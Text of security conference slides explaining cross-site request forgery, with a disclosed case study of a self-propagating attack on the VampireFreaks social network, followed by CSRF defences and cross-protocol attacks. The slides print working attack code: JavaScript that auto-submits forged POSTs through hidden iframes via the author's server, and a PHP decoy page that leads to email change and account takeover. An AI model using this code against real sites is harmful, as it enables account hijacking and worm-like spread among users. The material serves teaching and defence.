Surf’s Up! Daniel McCarney (@binaryparadox) The Next HOPE Exploring Cross Site Request Forgery through social network exploitation.

Page 1: Surf’s Up!

Daniel McCarney (@binaryparadox), The Next HOPE

Exploring Cross Site Request Forgery through social network exploitation.

Page 2: Surf's Up!

   http://binaryparadox.net   [email protected]

1. CSRF Background

2. Theory

3. VampireFreaks Exploitation

4. CSRF Protection

5. Interesting Benefits & CSRF Variation

Page 3: CSRF?

● CSRF → “Sea Surf” → Cross Site Request Forgery

● Self-explanatory name:

– Forcing requests to a site from another

● Open Web Application Security Project [1] Top 10

– #5 in 2007 [2]

– #5 in 2010 [3]

– 3 years and no improvement?

● “Prevalence: widespread” [3]

● “Detectability: easy” [3]

Page 4: Widespread

● First BugTraq Posting. CSRF term coined (2001)

– “Cross-Site Request Forgeries (Re: The Dangers of Allowing Users to Post Images)” [4]

● Ed Felten, Bill Zeller (2008)

– "Cross-Site Request Forgeries: Exploitation and Prevention" [5]

– ING Direct, Youtube, MetaFilter, NY Times

● “Sleeping Giant” [6]

● Very little developer knowledge!

Page 5: We <3 CSRF

● Easy!

– Web apps are often custom code i.e. likely vulnerable

– Moving back to thin clients & hosted services

● Very different from XSS. Less understood

– XSS and CSRF are complementary

– XSS helps us bypass CSRF protections

● Powerful implications

– If the user can do it, you can force them to do it

Page 6: Surf's Up!

Page 7: Storytime

● Imagine a made-up website, community.com

– Has various “members-only” sections

– Written in PHP, beginner to novice developer

● Members are able to post content to different topic threads

– Links, images, styled & formatted text

– Potentially BBCode/Limited Markup?

● Authentication done by Cookie & PHP Session

– HTTP Cookie with a session ID set by login code

● Needs a way to log members out by request

– http://community.com/app/logout.php

Page 8: Storytime

● Logout script receives a GET from an authenticated member

– Expires cookie, ends session, cleans-up

● Is there a problem?

● A tale of two users: Alice & Mallory

● Mallory posts a crafted image tag to part of a members only community.

– <img src="http://community.com/app/logout.php" />

– [img]http://community.com/app/logout.php[/img]

Page 9: Trouble at Sea

● Alice logs in to community.com

– Session ID stored in a cookie for community.com

● Alice browses to Mallory's crafted post

● Image tag is processed by Alice's browser

● GET request sent to http://community.com/app/logout.php to acquire image data

– Cookie is sent along for the ride!

– Why not? It's set for community.com

● Logout script dutifully gives Alice the boot!

Pages 10-13: Picture >= 1000 Words

Page 14: (Mis)understanding

● A purposefully toy example

● Bad “form” (har har) to logout with a GET request

– GET should be “Idempotent” [7] → No side effects

● Potentially misleading – CSRF does not rely on:

– The ability to post content to a target site,

– Image tags or a specific markup language

– A GET based form

Page 15: (Mis)understanding

● No requirement for content creation rights

– No need for tags/content to be placed on community.com

– Remember the “cross site” aspect?

● Not particular to Image tags

– Lots of tags invoke GET requests automatically

● Further, not limited to GET method forms

– Either social engineer a form POST

– Or use javascript to submit one automatically

Pages 16-19: More Complex Flow

Page 20: Surf's Up!

Page 21: VampireFreaks

● What is it? → “Gothbook”?

● ~1,228,795 members

● ~3,000 members online at any given time

● Appeal of social networks:

– Easy to embed content → images, CSS, html

– Easy to socially engineer users

– Easy to spread → designed for sharing!

Page 22: Disc-lame-er

● Vulnerability (mostly) already patched

– Disclosed responsibly

– Never released in the wild

– Wonderful treatment from admins

● Your actions are your own, not mine

● Yadda, yadda, yadda

Page 23: Attack Flow

● Attack components:

– Exploit - located on my server, POST-based

– A tracking account – hit tracking via PM

– Status updates – provide “viral” component

– Social Engineering – luring logged in users to exploit

Page 24: Social Engineering

● POST-based exploit means off-site visit required

● Need to lure logged-in users to exploit

– Enticing links in Forum Posts/Personal Messages

● Need to hide the true nature of the exploit

– BASE64 encoded URL parameter for “decoy” content

– Main page iframes the content of benign url param

Page 25: VF DOMination

● Exploit Code:

– Crafted POST requests submitting to VF

– Contained in iframes to conceal responses

– Submitted automatically via javascript

● 3 POSTs:

1) Changes registered e-mail address

2) Sends tracking PM

3) Updates the user's status

Page 26: E-mail Switch-a-roo

<form action="" method="post">
    <input type="hidden" value="" name="x">
    New Email: <input value="" name="new_email" maxlength="100" size="50">
    <br><br>
    <input type="submit" value="   click here to send my validation email to my new email address   ">
</form>

Page 27: Tracking PM

<form name="comment_form" onsubmit="submitonce(this)" action="" method="post">
    <input type="hidden" value="paradox" name="user">
    <input type="hidden" value="124670" name="uid">
    <input type="hidden" value="0" name="comment_id">
    <input type="hidden" value="0" name="i">
    <textarea wrap="soft" rows="13" cols="60" name="comment" id="comment_textarea"></textarea>
    ...
    <input type="checkbox" value="1" name="private"> Send To Inbox &nbsp;&nbsp;
    <input type="checkbox" value="1" id="preview" name="preview">Preview &nbsp;&nbsp;
    <input type="checkbox" checked="" value="1" name="include_sig">Include Signature &nbsp;&nbsp;
    ...
    <input type="submit" onclick="sendUserMessage(this.form, 'paradox');  return false;" value="  submit comment  ">
</form>

Page 28: Status Updates

<form method="post" action="/profiles/update_status.php" name="status_form">
  <span id="current_status">
    <input type="submit" onclick="updateStatus(); return false;" id="spopupgo" value="Go" name="submitstatus">
    <textarea onclick="getFocusChangeInput('update status...', this.id);" onblur="loseFocusChangeInput('update status...', this.id);" name="status_input" id="spopuptextarea">update status...</textarea>
  </span>
</form>

Page 29: Code Sample

<script type='text/javascript' language='JavaScript'>
// Builds the URL of the form-writing helper page, carrying the target URL and the
// field values as query parameters, and loads it in a 1x1 hidden iframe so that the
// response never becomes visible to the user.
function crossDomainPost(writer_url, post_target_url, params){
    var url_params = '';
    for (var key in params){
        url_params = url_params + '&' + key + '=' + encodeURIComponent(params[key]);
    }
    var url = writer_url + '?post_target_url=' + encodeURIComponent(post_target_url) + url_params;
    var iframe = document.createElement('iframe');
    iframe.setAttribute('src', url);
    iframe.setAttribute('width', 1);
    iframe.setAttribute('height', 1);
    iframe.setAttribute('style', 'border: none;');
    var p = document.getElementsByTagName('html');
    p[0].appendChild(iframe);
}
</script>

Page 30: Code Sample…

news_link = document.location;
crossDomainPost(
  'http://binaryparadox.net/vf/form_writer.php',
  'http://vampirefreaks.com/serv/ajaxController.php',
  {
    action: 'updateStatus',
    home: '0',
    status: news_link
  });
</script>
<?php
  $target = $_GET['id'];
  $target = base64_decode($target);
?>
<iframe src="<?php echo $target; ?>" width='100%' height='100%' style="border: none"/>

Page 31: Nothing to see here, move along

Page 32: Wheels within wheels

Page 33: The plot thickens...

● With the account e-mail changed, you could gain the account password

– “Forgot my password” feature

– Original account password sent in clear text

● Victims tracked by the PM sent

● Propagation achieved through status updates pointing back to the exploit page

Page 34: BAD BAD BAD BAD!

Page 35: Surf's Up!

Page 36: Halp! – Protection against CSRF

● Referrer checking

– All actions on site pass along the page referrer

– App checks referrer that sourced the submit

● vampirefreaks.com vs binaryparadox.net

● Effective?

– Possibly not foolproof...

– Plugin vulnerabilities (maybe?)

– XSS-paired CSRF? → issues regardless...

Page 37: Halp! – Protection against CSRF

● Nonce → a difficult to predict key/secret

● Should be generated per-request!

– Server writes nonce in hidden param for each form

– Also stores nonce in user's server side session

● Future requests must have the correct nonce

● Need XSS to access nonce as attacker [8]

Page 38: VF E-mail Change 2.0

<form action="" method="post">
    <input type="hidden" value="4a39014473ccf63bffdd8d96296b85b8d84f0ef4" name="validate">
    <input type="hidden" value="" name="x">
    New Email: <input value="" name="new_email" maxlength="100" size="50">
    <br><br>
    <input type="submit" value="   click here to send my validation email to my new email address   ">
</form>

Page 39: Surf's Up!

Page 40: What else?

● Cross Protocol Attacks

– Largely the same as CSRF

– Payload form data aimed at a non-HTTP service

● Jochen Topf – 2001

– “HTML Form Protocol Attack” [9]

– Tricking browsers into sending arbitrary data to specified port

– FTP, SMTP, NNTP, POP3, IMAP, & IRC

– Led to browsers blocking some ports by default [10]

Page 41: For the Lulz

● Blacklists are never perfect!

– Ask Goatse Security!

● Firefox XPS IRC Attack [11]

– Default IRC port not on blocked list

– Reflected IRC spam in the quest for lulz

● Safari XPS Attack [12]

– Unsigned short overflow in port #

– “Add 65536 to 25 to make 65561” [12]

– 65561 != 25. Troll on.
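The port-narrowing mistake behind the Safari slide, reproduced beside a port check that range-checks before narrowing, as an added JavaScript example that is not from the talk or from any browser's source. The blocklist contents are a constructed subset drawn from the protocols the slides name.

```javascript
// Added example (not from the talk or any browser): a parser that stores the port
// in an unsigned 16-bit field wraps 65561 to 25 (65561 - 65536). If the blocklist
// is consulted with the number as typed, it sees 65561 ("not blocked") while the
// socket opens port 25. Range-check before any narrowing, then apply the list.
// Constructed blocklist: ftp, smtp, pop3, nntp, imap, irc.
const BLOCKED_PORTS = new Set([21, 25, 110, 119, 143, 6667]);

// Narrowing to uint16, the step that turns 65561 into 25.
function truncateToUint16(port) {
  return port & 0xffff;
}

// The flawed order: decide from the typed number, connect with the narrowed one.
function naiveDecision(text) {
  const typed = Number(text);
  return {
    allowed: !BLOCKED_PORTS.has(typed),   // 65561 is not on the list
    connectsTo: truncateToUint16(typed),  // ...but the connection goes to 25
  };
}

// The fixed order: parse strictly, range-check before narrowing, then block.
function parsePort(text) {
  if (!/^[0-9]{1,5}$/.test(text)) return null; // rejects "", "+25", "25 ", "0x19"
  const n = Number(text);
  if (n < 1 || n > 65535) return null;          // 65561 is refused, never wrapped
  return n;
}

// What a navigation layer does with the result: invalid URL, refused, or allowed.
function classifyPort(text) {
  const port = parsePort(text);
  if (port === null) return 'invalid';
  return BLOCKED_PORTS.has(port) ? 'blocked' : 'allowed';
}
```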

Page 42: On Obscuring Origin

● Think of exploit flow

– User requests bad content

– Bad content forces user to perform an action

● Often difficult to link bad content to action

● Attack source is the User

● What the User can access, the exploit can

Page 43: On Obscuring Origin

● Behind the Wall

– Attacks can access Intranet resources

– Networking equipment

– Test servers

– Private systems

● SOHO Routers

– Reflash firmware [13]

– Set DNS Server(s) [14]

Pages 44-47: On Obscuring Origin

Page 48: Clickjacking

● An evolution of CSRF?

● Still forcing authenticated client actions

● Bypasses nonce protection: whole page loaded invisibly

● Uses the real forms instead of a cross-site request (nonce intact)

● Hijacks user input to manipulate invis. page

Page 49: </presentation>

● Hat tip to Ebova, Mreh, Clutch, Temujin, ZanZ

● http://friendsofbyron.alteeve.com/

Page 50: Resources

1 – OWASP – http://owasp.org

2 – OWASP top 10 2007 – http://www.owasp.org/index.php/Top_10_2007

3 – OWASP top 10 2010 – http://www.owasp.org/index.php/Top_10_2010

4 – Cross-Site Request Forgeries (Re: The Dangers of Allowing Users to Post Images) – http://www.tux.org/~peterw/csrf.txt

5 – "Cross-Site Request Forgeries: Exploitation and Prevention" – http://from.bz/public/documents/publications/csrf.pdf

6 – "Sleeping Giant" – http://jeremiahgrossman.blogspot.com/2006/09/csrf-sleeping-giant.html

7 – HTTP Spec – http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html

8 – Jack Mannino – http://twitter.com/jack_mannino

Page 51: Resources

9 – "HTML Form Protocol Attack" – http://www.remote.org/jochen/sec/hfpa/hfpa.pdf

10 – Mozilla Port Blacklisting – http://www.mozilla.org/projects/netlib/PortBanning.html

11 – Firefox XPS Attack (NSFW) – http://encyclopediadramatica.com/Firefox_XPS_IRC_Attack

12 – Safari XPS Attack (NSFW) – http://encyclopediadramatica.com/Safari_XPS_Attack

13 – CSRF File Upload – http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/

14 – CSRF BT Router Research – http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub/